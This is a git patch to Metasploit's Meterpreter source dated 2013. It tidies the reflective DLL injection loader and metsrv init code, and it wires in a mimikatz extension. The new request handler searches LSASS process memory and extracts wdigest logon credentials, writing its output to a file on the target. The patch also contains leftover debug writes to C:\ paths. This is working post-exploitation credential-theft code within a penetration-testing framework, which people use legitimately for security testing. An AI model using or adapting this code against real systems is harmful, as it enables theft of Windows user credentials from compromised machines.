From 21e2b1fecfbd85df9467bf46c9b70a684d61daba Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 19 Apr 2013 21:45:33 +0100 Subject: [PATCH] Tidy --- .../ReflectiveDLLInjection/DelayLoadMetSrv.h | 12 ++--- .../ReflectiveDLLInjection/ReflectiveLoader.c | 13 +---- .../ReflectiveDLLInjection/ReflectiveLoader.h | 2 +- c/meterpreter/source/common/base.h | 5 -- c/meterpreter/source/common/common.h | 2 +- .../source/extensions/mimikatz/main.cpp | 50 ++++++++++++++++--- .../source/extensions/mimikatz/mimikatz.h | 7 +-- c/meterpreter/source/server/metsrv.c | 9 ---- .../ext_server_mimikatz.vcxproj | 12 ++++- 9 files changed, 62 insertions(+), 50 deletions(-) diff --git a/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h b/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h index 08fce2c8..9632ef40 100644 --- a/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h +++ b/c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h @@ -35,15 +35,11 @@ #pragma comment (lib,"Delayimp.lib") // we use this like a macro to set the hook in an server extension that requires it -#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c +#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c -#ifdef __cplusplus - extern "C" HMODULE hMetSrv; - extern "C" FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli ); -#else - extern HMODULE hMetSrv; - FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli ); -#endif +extern HMODULE hMetSrv; + +FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli ); //===============================================================================================// #endif diff --git a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c index 9ec222c7..9eb02474 100644 --- a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c +++ b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c @@ -183,7 +183,7 @@ geteip: while( usCounter > 0 ) { // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); + dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); // if we have found a function we want we get its virtual address if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH ) @@ -435,22 +435,13 @@ geteip: #ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN // you must implement this function... +extern DWORD DLLEXPORT Init( SOCKET socket ); -#ifdef __cplusplus -extern "C" DWORD DLLEXPORT Init( SOCKET socket ); -extern "C" BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ) ; - return TRUE; -} -#else -DWORD DLLEXPORT Init( SOCKET socket ); BOOL MetasploitDllAttach( SOCKET socket ) { Init( socket ); return TRUE; } -#endif BOOL MetasploitDllDetach( DWORD dwExitFunc ) { diff --git a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h index 785fad2b..fc54cc50 100644 --- a/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h +++ b/c/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h @@ -63,7 +63,7 @@ __forceinline DWORD ror( DWORD d ) -__forceinline DWORD _hash( char * c ) +__forceinline DWORD hash( char * c ) { register DWORD h = 0; do diff --git a/c/meterpreter/source/common/base.h b/c/meterpreter/source/common/base.h index dfa55915..77d86785 100644 --- a/c/meterpreter/source/common/base.h +++ b/c/meterpreter/source/common/base.h @@ -40,13 +40,8 @@ typedef struct command struct command *prev; } Command; -#ifdef __cplusplus -extern "C" LINKAGE DWORD command_register(Command *command); -extern "C" LINKAGE DWORD command_deregister(Command *command); -#else LINKAGE DWORD command_register(Command *command); LINKAGE DWORD command_deregister(Command *command); -#endif LINKAGE VOID command_join_threads( VOID ); diff --git a/c/meterpreter/source/common/common.h b/c/meterpreter/source/common/common.h index 5dfa3a37..d8547f41 100644 --- a/c/meterpreter/source/common/common.h +++ b/c/meterpreter/source/common/common.h @@ -203,7 +203,7 @@ static void real_dprintf(char *format, ...) { va_start(args,format); vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args); strcat_s(buffer, sizeof(buffer), "\r\n"); - OutputDebugStringA(buffer); + OutputDebugString(buffer); } #endif diff --git a/c/meterpreter/source/extensions/mimikatz/main.cpp b/c/meterpreter/source/extensions/mimikatz/main.cpp index 3b101fe1..0c61fba1 100644 --- a/c/meterpreter/source/extensions/mimikatz/main.cpp +++ b/c/meterpreter/source/extensions/mimikatz/main.cpp @@ -1,18 +1,28 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H -#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H +#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H +#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H +extern "C" +{ #include "../../common/common.h" +} #endif +#include +#include +#include +#include + + #include "mimikatz.h" + +extern "C" +{ + +#include "modules/mod_mimikatz_sekurlsa.h" + /* Benjamin DELPY `gentilkiwi` http://blog.gentilkiwi.com benjamin@gentilkiwi.com Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/fr/ */ -#include "modules/globdefs.h" -#include -#include -#include "mimikatz.h" - #include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h" // include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function @@ -20,11 +30,36 @@ // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #include "../../ReflectiveDLLInjection/ReflectiveLoader.c" + // this sets the delay load hook function, see DelayLoadMetSrv.h EnableDelayLoadMetSrv(); DWORD request_boiler(Remote *remote, Packet *packet) { + packet_transmit_response(0, remote, packet); + FILE *ficheiro = fopen("c:\\test.txt", "wb"); + fclose(ficheiro); + std::wofstream logFile( "c:\\out.txt"); + std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf()); + std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf()); + + vector * mesArguments = new vector(); + + mimikatz * myMimiKatz = new mimikatz(mesArguments); + + vector> monProvider; + monProvider.push_back(make_pair(mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData, wstring(L"wdigest"))); + + if (mod_mimikatz_sekurlsa::searchLSASSDatas()) + { + mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider); + } + + std::wcout.rdbuf(outbuf); + std::wcerr.rdbuf(errbuf); + + packet_transmit_response(0, remote, packet); + return 0; } @@ -73,6 +108,7 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) return ERROR_SUCCESS; } +} //int wmain(int argc, wchar_t * argv[]) diff --git a/c/meterpreter/source/extensions/mimikatz/mimikatz.h b/c/meterpreter/source/extensions/mimikatz/mimikatz.h index a8e28398..6844cc57 100644 --- a/c/meterpreter/source/extensions/mimikatz/mimikatz.h +++ b/c/meterpreter/source/extensions/mimikatz/mimikatz.h @@ -1,8 +1,3 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H -#define _METERPRETER_SOURCE_EXTENSION_BOILER_BOILER_H -#include "../../common/common.h" -#endif - /* Benjamin DELPY `gentilkiwi` http://blog.gentilkiwi.com benjamin@gentilkiwi.com @@ -10,7 +5,7 @@ */ #pragma once #include "modules/globdefs.h" -#include "modules/mod_parseur.h" +#include "modules/mod_parseur.h" #include "modules/mod_pipe.h" #include "modules/mod_process.h" #include "modules/mod_system.h" diff --git a/c/meterpreter/source/server/metsrv.c b/c/meterpreter/source/server/metsrv.c index baa65c21..1bd6d8b9 100644 --- a/c/meterpreter/source/server/metsrv.c +++ b/c/meterpreter/source/server/metsrv.c @@ -13,21 +13,12 @@ * Entry point for the DLL (or not if compiled as an EXE) */ #ifdef _WIN32 -#ifdef __cplusplus -extern "C" DWORD __declspec(dllexport) Init(SOCKET fd) -{ - - return server_setup(fd); - -} -#else DWORD __declspec(dllexport) Init(SOCKET fd) { return server_setup(fd); } -#endif #else // rtld dynamically links libc/libm/libcrypto/libssl/metsrv_main diff --git a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj index 68d736a6..e8f448a0 100644 --- a/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj +++ b/c/meterpreter/workspace/ext_server_mimikatz/ext_server_mimikatz.vcxproj @@ -65,8 +65,8 @@ $(SolutionDir)$(Configuration)\ $(Configuration)\ true - $(SolutionDir)$(Configuration)\ - $(Configuration)\ + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ false false $(SolutionDir)$(Configuration)\$(Platform)\ @@ -88,6 +88,8 @@ AllRules.ruleset + $(ProjectName).x86 + $(ProjectName).x86 @@ -109,6 +111,9 @@ MachineX86 kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;;psapi.lib;advapi32.lib;user32.lib;secur32.lib;crypt32.lib;shlwapi.lib;wtsapi32.lib;%(AdditionalDependencies) + + copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\" + @@ -150,6 +155,9 @@ MachineX86 5.0 + + copy /y "$(OutDir)$(TargetName)$(TargetExt)" "$(ProjectDir)..\..\output\" +